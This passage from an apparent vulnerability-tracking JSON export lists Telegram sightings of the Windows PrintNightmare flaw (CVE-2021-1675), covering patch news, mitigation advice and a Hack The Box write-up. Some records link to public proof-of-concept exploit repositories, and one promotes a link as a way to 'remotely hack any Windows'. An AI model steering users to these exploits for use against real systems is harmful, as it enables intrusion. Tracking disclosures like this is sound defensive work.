\u0442\u043e, \u0447\u0442\u043e PrintNightmare \u0443\u0436\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0445\u0430\u043a\u0435\u0440\u0430\u043c\u0438 \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435 (\u0435\u0449\u0435 \u0431\u044b, PoC-\u0442\u043e \u0443\u0436\u0435 \u0434\u0430\u0432\u043d\u043e \u0432 \u043f\u0430\u0431\u043b\u0438\u043a\u0435).\n\n\u041e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 Microsoft \u043f\u043e \u0441\u043d\u0438\u0436\u0435\u043d\u0438\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0435\u0441\u0442\u044c \u043f\u043e \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u043d\u043d\u043e\u0439 \u0441\u0441\u044b\u043b\u043a\u0435.", "creation_timestamp": "2021-07-02T10:23:45.000000Z"}, {"uuid": "9f40c4f0-0ee2-4d39-a880-4a7e56471481", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://t.me/true_secator/1873", "content": "\u200b\u200b\u041d\u0443 \u0438 \u0432\u0434\u043e\u0433\u043e\u043d\u043a\u0443 \u043a \u043d\u0435\u0434\u0430\u0432\u043d\u0435\u043c\u0443 \u043f\u043e\u0441\u0442\u0443 \u043f\u0440\u043e \u043d\u0435\u0437\u0430\u043a\u0440\u044b\u0442\u0443\u044e CVE-2021-1675", "creation_timestamp": "2021-06-30T21:00:11.000000Z"}, {"uuid": "33247d38-50da-4630-b424-143d92e7da9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "https://t.me/true_secator/1871", "content": "\u041e\u0439, \u0431\u043b\u044f....\n\n\u0422\u0443\u0442 \u043f\u0438\u0448\u0443\u0442, \u0447\u0442\u043e \u0438\u044e\u043d\u044c\u0441\u043a\u0438\u0439 \u043f\u0430\u0442\u0447 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043e\u0442 Microsoft \u043d\u0435 \u0437\u0430\u043a\u0440\u044b\u043b CVE-2021-1675 aka PrintNightmare, \u043f\u0440\u043e \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043c\u044b \u043f\u0438\u0441\u0430\u043b\u0438 \u0432\u0447\u0435\u0440\u0430 \u0438 \u043a \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043d\u0430 \u0434\u043d\u044f\u0445 \u043f\u043e\u044f\u0432\u0438\u043b\u0441\u044f PoC.\n\n\u041d\u0430\u043f\u043e\u043c\u043d\u0438\u043c, \u0447\u0442\u043e CVE-2021-1675 - \u044d\u0442\u043e \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0430\u044f \u043a \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043a\u043e\u0434\u0430 (RCE) \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0434\u0438\u0441\u043f\u0435\u0442\u0447\u0435\u0440\u0435 \u043e\u0447\u0435\u0440\u0435\u0434\u0438 \u043f\u0435\u0447\u0430\u0442\u0438 spoolsv.exe (Print Spooler) \u0432 Windows. \u041f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e Print Spooler \u0432\u043a\u043b\u044e\u0447\u0435\u043d \u043d\u0430 \u0432\u0441\u0435\u0445 \u043c\u0430\u0448\u0438\u043d\u0430\u0445.\n\n\u0418\u043c\u0435\u0435\u043c - \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u043d\u0435\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u0430\u044f RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0438 \u043e\u043a\u0430\u0437\u0430\u0432\u0448\u0438\u0439\u0441\u044f \u0432 \u043f\u0430\u0431\u043b\u0438\u043a\u0435 PoC \u0435\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438. \u041a\u0430\u0437\u0430\u043b\u043e\u0441\u044c \u0431\u044b, \u0447\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0439\u0442\u0438 \u043d\u0435 \u0442\u0430\u043a?\n\n\u0410 \u0442\u0435\u043f\u0435\u0440\u044c \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e - \u0435\u0441\u043b\u0438 \u044d\u0442\u043e \u043f\u0440\u0430\u0432\u0434\u0430 (\u0430 \u043c\u044b \u0443\u0437\u043d\u0430\u0435\u043c \u043e\u0431 \u044d\u0442\u043e\u043c, \u043f\u043e\u043b\u0430\u0433\u0430\u0435\u043c, \u0432 \u0431\u043b\u0438\u0436\u0430\u0439\u0448\u0438\u0435 \u0447\u0430\u0441\u044b), \u0442\u043e \u044d\u0442\u043e \u043f\u0438\u0437\u0434\u0435\u0446\u043a\u0438\u0439 \u043f\u0438\u0437\u0434\u0435\u0446. \u0412\u044b \u0437\u043d\u0430\u0435\u0442\u0435, \u043c\u044b \u043d\u0435\u0447\u0430\u0441\u0442\u043e \u043c\u0430\u0442\u0435\u0440\u0438\u043c\u0441\u044f, \u043d\u043e \u044d\u0442\u043e \u0438\u043c\u0435\u043d\u043d\u043e \u0442\u043e\u0442 \u0441\u0430\u043c\u044b\u0439 \u0441\u043b\u0443\u0447\u0430\u0439. \u041f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0440\u0430\u0437 \u043c\u044b \u0442\u0430\u043a\u043e\u0435 \u0432 Stuxnet \u0432\u0438\u0434\u0430\u043b\u0438. \n\n\u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u043c \u043f\u0440\u043e\u0444\u0438\u043b\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043e\u0442\u0440\u0443\u0431\u0438\u0442\u044c spoolsv.exe. \n\nP.S. \u041f\u043e\u043a\u0430 \u043c\u044b \u043f\u0438\u0441\u0430\u043b\u0438 \u043f\u043e\u0441\u0442 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0442\u0432\u0438\u0442\u043e\u0432 \u043f\u0440\u043e \u0442\u043e, \u0447\u0442\u043e \u043f\u0430\u0442\u0447 \u043d\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 CVE-2021-1675 \u043f\u0440\u043e\u043f\u0430\u043b\u0438, \u0445\u043e\u0442\u044f \u0434\u0440\u0443\u0433\u0438\u0435 \u043e\u0441\u0442\u0430\u043b\u0438\u0441\u044c. \u042d\u0442\u043e \u043e\u0447\u0435\u043d\u044c \u0441\u0442\u0440\u0430\u043d\u043d\u043e.", "creation_timestamp": "2021-06-30T15:43:02.000000Z"}, {"uuid": "0d0bd7f8-456d-4a5b-a8d5-b02a3f94dc77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/true_secator/1866", "content": "The Record \u043f\u0438\u0448\u0435\u0442, \u0447\u0442\u043e \u0441\u0435\u0433\u043e\u0434\u043d\u044f \u0442\u0440\u043e\u0435 \u043a\u0438\u0442\u0430\u0439\u0441\u043a\u0438\u0445 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438\u0437 Sangfor \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u043d\u0430 GitHub \u043f\u043e\u043b\u043d\u043e\u0435 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 CVE-2021-1675 \u0438 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0439 PoC. \u041e\u0448\u0438\u0431\u043a\u0443 \u043e\u043d\u0438 \u043d\u0430\u0437\u0432\u0430\u043b\u0438 PrintNightmare.\n\nCVE-2021-1675, \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u0430\u044f \u0432 \u0438\u044e\u043d\u044c\u0441\u043a\u043e\u043c \u043f\u0430\u0442\u0447\u0435 Windows, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0434\u044b\u0440\u043a\u0443 \u0432 \u0434\u0438\u0441\u043f\u0435\u0442\u0447\u0435\u0440\u0435 \u043e\u0447\u0435\u0440\u0435\u0434\u0438 \u043f\u0435\u0447\u0430\u0442\u0438 spoolsv.exe. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043a\u043e\u0434\u0430 (RCE) \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0444\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0437\u044f\u0442\u044c \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d\u043d\u0443\u044e \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u043f\u043e\u0434 \u043f\u043e\u043b\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c.\n\n\u0412\u0447\u0435\u0440\u0430 \u043a\u0438\u0442\u0430\u0439\u0446\u044b \u0438\u0437 QiAnXin \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u0432 \u0441\u0432\u043e\u0435\u043c Twitter GIF \u0432 \u043f\u043b\u043e\u0445\u043e\u043c \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u0438, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0431\u044b\u043b \u043f\u043e\u043a\u0430\u0437\u0430\u043d \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043e\u0448\u0438\u0431\u043a\u0438. \u0418\u0437-\u0437\u0430 \u044d\u0442\u043e\u0433\u043e \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u044b\u0435 \u043a\u0438\u0442\u0430\u0439\u0446\u044b \u0438\u0437 Sangfor \u0440\u0435\u0448\u0438\u043b\u0438 \u0432\u044b\u043b\u043e\u0436\u0438\u0442\u044c \u0441\u0432\u043e\u0439 PoC, \u043a\u043e\u0442\u043e\u0440\u044b\u0439, \u043f\u043e \u0438\u0445 \u0441\u043b\u043e\u0432\u0430\u043c \u043e\u043d\u0438 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043b\u0438 \u0441\u0430\u043c\u043e\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0434\u043b\u044f \u0443\u0447\u0430\u0441\u0442\u0438\u044f \u0432 \u0441\u043e\u0440\u0435\u0432\u043d\u043e\u0432\u0430\u043d\u0438\u0438 Tianfu Cup. \n\n\u0421\u043f\u0443\u0441\u0442\u044f \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0447\u0430\u0441\u043e\u0432 \u043e\u043d\u0438 \u043e\u0434\u0443\u043c\u0430\u043b\u0438\u0441\u044c \u0438 \u0443\u0434\u0430\u043b\u0438\u043b\u0438 \u043c\u0430\u0442\u0435\u0440\u0438\u0430\u043b\u044b \u0438\u0437 GitHub, \u043d\u043e \u0437\u0430 \u044d\u0442\u043e \u0432\u0440\u0435\u043c\u044f \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u0438 PoC \u0443\u0436\u0435 \u0443\u0441\u043f\u0435\u043b\u0438 \u0440\u0430\u0441\u0442\u0430\u0449\u0438\u0442\u044c. \u0412 \u0441\u0432\u044f\u0437\u0438 \u0441 \u044d\u0442\u0438\u043c \u043e\u0436\u0438\u0434\u0430\u0435\u043c \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430 CVE-2021-1675 \u0432 \u043f\u0430\u0431\u043b\u0438\u043a\u0435 \u0432 \u0431\u043b\u0438\u0436\u0430\u0439\u0448\u0435\u0435 \u0432\u0440\u0435\u043c\u044f.\n\n\u0412\u044b\u0432\u043e\u0434, \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e, \u043e\u0434\u0438\u043d - \u0435\u0441\u043b\u0438 \u043d\u0435 \u043e\u0431\u043d\u043e\u0432\u0438\u043b\u0438 \u0441\u0432\u043e\u0438 Windows, \u0442\u043e \u0441\u0434\u0435\u043b\u0430\u0439\u0442\u0435 \u044d\u0442\u043e \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u0441\u0442\u0440\u0435\u0435. RCE - \u044d\u0442\u043e \u0432\u0430\u043c, \u0437\u043d\u0430\u0435\u0442\u0435 \u043b\u0438, \u043d\u0435 \u0432\u044b\u0441\u0442\u0443\u043f\u043b\u0435\u043d\u0438\u0435 \u0441\u0431\u043e\u0440\u043d\u043e\u0439 \u0420\u043e\u0441\u0441\u0438\u0438 \u043f\u043e \u0444\u0443\u0442\u0431\u043e\u043b\u0443 \u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c, \u0430 \u0433\u043e\u0440\u0430\u0437\u0434\u043e \u0431\u043e\u043b\u044c\u043d\u0435\u0435.", "creation_timestamp": "2021-06-29T16:49:28.000000Z"}, {"uuid": "e609b0fe-78dd-47c5-bf83-79696f303b99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/true_secator/1874", "content": "\u200b\u200b\u0418\u0441\u0442\u043e\u0440\u0438\u044f \u0441 \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e PrintNightmare \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u0432\u0441\u0435 \u0447\u0443\u0434\u0435\u0441\u0430\u0442\u0435\u0435 \u0438 \u0447\u0443\u0434\u0435\u0441\u0430\u0442\u0435\u0435, \u043a\u0430\u043a \u0441\u043a\u0430\u0437\u0430\u043b\u0430 \u0431\u044b \u043a\u044d\u0440\u0440\u043e\u043b\u043e\u0432\u0441\u043a\u0430\u044f \u0410\u043b\u0438\u0441\u0430.\n\n\u0418\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043a\u0438\u0442\u0430\u0439\u0441\u043a\u043e\u0439 Sangfor, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u044b\u043b\u043e\u0436\u0438\u043b\u0438 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0434\u0435\u0442\u0430\u043b\u0438 \u0438 PoC \u043e\u0448\u0438\u0431\u043a\u0438, \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u0438, \u0447\u0442\u043e \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u0430\u044f \u0438\u043c\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0438\u043c\u0435\u043d\u043d\u043e CVE-2021-1675 \u0438 \u0435\u0441\u0442\u044c. \u0410 CVE-2021-1675 \u0431\u044b\u043b\u0430 \u0443\u0436\u0435 \u0437\u0430\u043a\u0440\u044b\u0442\u0430 \u0438\u044e\u043d\u044c\u0441\u043a\u0438\u043c \u043f\u0430\u0442\u0447\u0435\u043c \u043e\u0442 Microsoft.\n\n\u041e\u0434\u043d\u0430\u043a\u043e, \u0441\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u043f\u043e\u044f\u0432\u0438\u0432\u0448\u0435\u0439\u0441\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438, \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u0430\u044f \u043a\u0438\u0442\u0430\u0439\u0446\u0430\u043c\u0438 \u0434\u044b\u0440\u043a\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e CVE-2021-1675 \u0432\u043e\u0432\u0441\u0435 \u043d\u0435 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f, \u044d\u0442\u043e \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u043d\u043e \u0441\u0430\u043c\u043e\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u0430\u044f 0-day. \u0415\u0441\u043b\u0438 \u044d\u0442\u043e \u0442\u0430\u043a, \u0442\u043e \u044d\u0442\u043e \u043e\u0431\u044a\u044f\u0441\u043d\u044f\u0435\u0442 \u0432\u0447\u0435\u0440\u0430\u0448\u043d\u0438\u0439 \u043a\u0435\u0439\u0441, \u043a\u043e\u0433\u0434\u0430 \u043d\u0430 \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0435\u043d\u043d\u044b\u0445 Windows \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f PrintNightmare \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u043b\u0430 \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c.\n\n\u041a\u0441\u0442\u0430\u0442\u0438, \u0414\u0435\u043b\u043f\u0438 \u0443\u0436\u0435 \u043f\u0440\u043e\u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043b \u0443\u0441\u043f\u0435\u0448\u043d\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043e\u0448\u0438\u0431\u043a\u0438, \u0430 \u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e - \u0434\u043e \u0435\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0432 Mimikatz \u043e\u0441\u0442\u0430\u043b\u043e\u0441\u044c \u043d\u0435\u0434\u043e\u043b\u0433\u043e.\n\n\u041d\u0430\u043f\u043e\u043c\u043d\u0438\u043c, \u0447\u0442\u043e PrintNightmare \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0438\u0442\u044c RCE \u0441 \u043f\u043e\u0437\u0438\u0446\u0438\u0438 \u043b\u044e\u0431\u043e\u0433\u043e \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f. \u0422\u0430\u043a \u0447\u0442\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u044f, \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e, \u0442\u0430 \u0436\u0435, \u0447\u0442\u043e \u0438 \u0431\u044b\u043b\u0430 \u0432\u0447\u0435\u0440\u0430 - \u0441\u0440\u043e\u0447\u043d\u043e \u043e\u0442\u0440\u0443\u0431\u0438\u0442\u044c spoolsv.exe, \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u043d\u0430 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430\u0445 \u0434\u043e\u043c\u0435\u043d\u0430.", "creation_timestamp": "2021-07-01T10:59:57.000000Z"}, {"uuid": "c8008171-42f4-4463-8a48-971433cabd62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "Telegram/Ou-Kzzl3nLkADt9_Yue4jZMgPKq1aQqAvVswhjnvvkETSg", "content": "", "creation_timestamp": "2021-07-16T14:35:20.000000Z"}, {"uuid": "2d3203d9-f02f-4bfc-b187-e38e0ad5c1d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/crackcodes/121", "content": "https://github.com/cube0x0/CVE-2021-1675/blob/main/CVE-2021-1675.py\n\u261d\ufe0f\u261d\ufe0f\u261d\ufe0fRemotly hack any window", "creation_timestamp": "2021-07-10T05:15:39.000000Z"}, {"uuid": "b1cd5669-b217-4774-8186-75edc0ee3682", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/pwnwiki_zhchannel/725", "content": "CVE-2021-1675 Windows Print Spooler\u9060\u7a0b\u4ee3\u78bc\u57f7\u884c\u6f0f\u6d1e\nhttps://www.pwnwiki.org/index.php?title=CVE-2021-1675_Windows_Print_Spooler%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E", "creation_timestamp": "2021-09-21T04:42:21.000000Z"}, {"uuid": "43dfa437-1453-4faf-b8f1-41e7baba8db2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/information_security_channel/44549", "content": "Windows Admins Scrambling to Contain 'PrintNightmare' Flaw Exposure\nhttp://feedproxy.google.com/~r/securityweek/~3/IsQMasJIps8/windows-admins-scrambling-contain-printnightmare-flaw-exposure\n\nWindows network administrators are scrambling to contain the fallout from the release of proof-of-concept code for a nasty Windows Print Spooler vulnerability (https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675) that exposes Windows servers to remote code execution attacks.\nread more (https://www.securityweek.com/windows-admins-scrambling-contain-printnightmare-flaw-exposure)", "creation_timestamp": "2021-06-30T16:38:46.000000Z"}, {"uuid": "a3d9f1ec-55d3-4fe8-bcae-2b1f2011d78a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://t.me/information_security_channel/44635", "content": "Did Microsoft Botch the PrintNightmare Patch?\nhttp://feedproxy.google.com/~r/securityweek/~3/PqEJjMi6APQ/did-microsoft-botch-printnightmare-patch\n\nJust days after shipping an emergency Windows update to cover a dangerous code execution flaw (CVE-2021-1675 (https://www.securityweek.com/windows-admins-scrambling-contain-printnightmare-flaw-exposure)) in the Print Spooler service, Microsoft is investigating a new set of claims that its so-called \u2018PrintNightmare\u2019 patch has not properly fixed the underlying vulnerability.\nread more (https://www.securityweek.com/did-microsoft-botch-printnightmare-patch)", "creation_timestamp": "2021-07-09T17:30:01.000000Z"}, {"uuid": "f3a5595e-fea1-4638-9e99-776e8502e615", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "https://t.me/thehackernews/1327", "content": "\ud83d\udd25 Researchers publish a proof-of-concept exploit for a critical vulnerability (CVE-2021-1675) affecting Microsoft Windows operating systems.\n\nDetails \u2014 https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html", "creation_timestamp": "2021-06-30T13:36:01.000000Z"}, {"uuid": "6c0b45a6-85e2-41cb-8760-e8988e0798c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/thehackernews/1333", "content": "\ud83d\udd25 WATCH OUT! Microsoft warns of critical PrintNightmare RCE vulnerability (CVE-2021-34527) being exploited in the wild.\n\nDetails: https://thehackernews.com/2021/07/microsoft-warns-of-critical.html\n\nIt is separate from the Windows Print Spooler issue (CVE-2021-1675) Microsoft patched recently.", "creation_timestamp": "2021-07-02T07:44:31.000000Z"}, {"uuid": "ae68812d-dcb0-4035-a185-3af520d8c05b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/xakep_ru/12002", "content": "HTB Driver. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c PrintNightmare \u0438 \u0434\u0435\u043b\u0430\u0435\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 SCF #htb #driver #printnightmare #scf #\u043f\u043e\u0434\u043f\u0438\u0441\u0447\u0438\u043a\u0430\u043c\n\n\u0421\u0435\u0433\u043e\u0434\u043d\u044f \u043c\u044b \u0441 \u0442\u043e\u0431\u043e\u0439 \u0440\u0430\u0437\u0431\u0435\u0440\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c PrintNightmare, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0432 Windows \u0447\u0435\u0440\u0435\u0437 \u0431\u0430\u0433 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u043f\u0435\u0447\u0430\u0442\u0438 (CVE-2021-1675), \u0441\u0434\u0435\u043b\u0430\u0435\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0444\u0430\u0439\u043b SCF, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u043c\u043e\u0436\u0435\u0442 \u043d\u0430\u043c \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c NTLM-\u0445\u0435\u0448 \u043f\u0430\u0440\u043e\u043b\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u0438 \u043f\u0440\u043e\u0439\u0434\u0435\u043c \u043c\u0430\u0448\u0438\u043d\u0443 Driver \u0441 \u043f\u043b\u043e\u0449\u0430\u0434\u043a\u0438 Hack The Box.\n\nhttps://xakep.ru/2022/02/28/htb-driver/", "creation_timestamp": "2022-02-28T16:00:54.000000Z"}, {"uuid": "0afd1911-59e1-4e63-83fc-8f47a027b546", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/BlueRedTeam/1276", "content": "CVE-2021\n\nCVE-2021-1675 LPE PoC in Nim (PrintNightmare Local Privilege Escalation)\n\nhttps://github.com/fumamatar/NimNightmare-\n\n@BlueRedTeam", "creation_timestamp": "2022-08-19T09:32:59.000000Z"}, {"uuid": "7657a766-8568-4d0e-aa98-7acaeaae539e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/BlueRedTeam/1277", "content": "CVE-2021\nCVE-2021-1675 LPE PoC in Nim (PrintNightmare Local Privilege Escalation)\n\nhttps://github.com/fumamatar/NimNightmare\n\n@BlueRedTeam", "creation_timestamp": "2021-12-05T16:33:42.000000Z"}, {"uuid": "6c07bfde-957d-4b28-843c-6530b87a793d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/SecLabNews/10485", "content": "\u0420\u044f\u0434 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0432 \u043e\u0431\u043b\u0430\u0441\u0442\u0438 